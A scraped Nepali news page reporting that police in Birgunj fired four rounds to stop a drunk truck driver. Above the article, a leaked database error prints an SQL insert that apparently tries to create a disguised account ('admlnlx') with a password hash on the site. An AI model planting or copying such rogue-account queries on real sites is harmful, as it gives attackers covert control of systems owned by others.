WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2YDRfwhg0Xz.TXDtjyF/Si8cDj0Lm/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-24 22:47:11', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बीरगन्जमा मापसे चालक समात्न चार राउण्ड गोली – Gaule Khabar

बीरगन्जमा मापसे चालक समात्न चार राउण्ड गोली

बीरगन्जमा मापसे चालक समात्न चार राउण्ड गोली

काठमाडौं,पुस, ९-

 बिहीबार राति एक जना भारतीय चालकले अत्यधिक मदिरा सेवन गरेर बीरञ्जमा मालबाहक गाडी कुदाए । उनलाई नियन्त्रणमा लिन नेपाल प्रहरीले चार राउण्ड गोली चलाउन पर्‍यो ।

भारतको बिहार प्रान्तमा मदिरा किनबेच र सेवनमा प्रतिबन्ध लागेपछि नेपाल भित्रने मालबाहक गाडीका अधिकांश सवारीचालकले मदिरा सेवन गर्ने गर्छन् । आजको नागरिक दैनिकमा समाचार छ ।

बीरगन्ज १६ पावरहाउस चोकमा जाँचमा खटिएका प्रहरीले दक्षिणबाट उत्तरतर्फ आउँदै गरेको ट्रकलाई रोक्न इसारा गरे । ट्रक गति बढाउँदै उत्तर गण्डकतिर कुद्यो । चोकचोकका प्रहरीले रोक्न आग्ह गर्दा पनि ट्रक रोकिएन । र, प्रहरी गोली चलाउँन वाध्य भयो ।

सवारी चालक करु यादव, सहचालक धनन्जयकुमार माथुरी र जेएच २ जेड ८६५१ नम्बरको गाडीलाई प्हरीले नियन्त्रणमा लिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका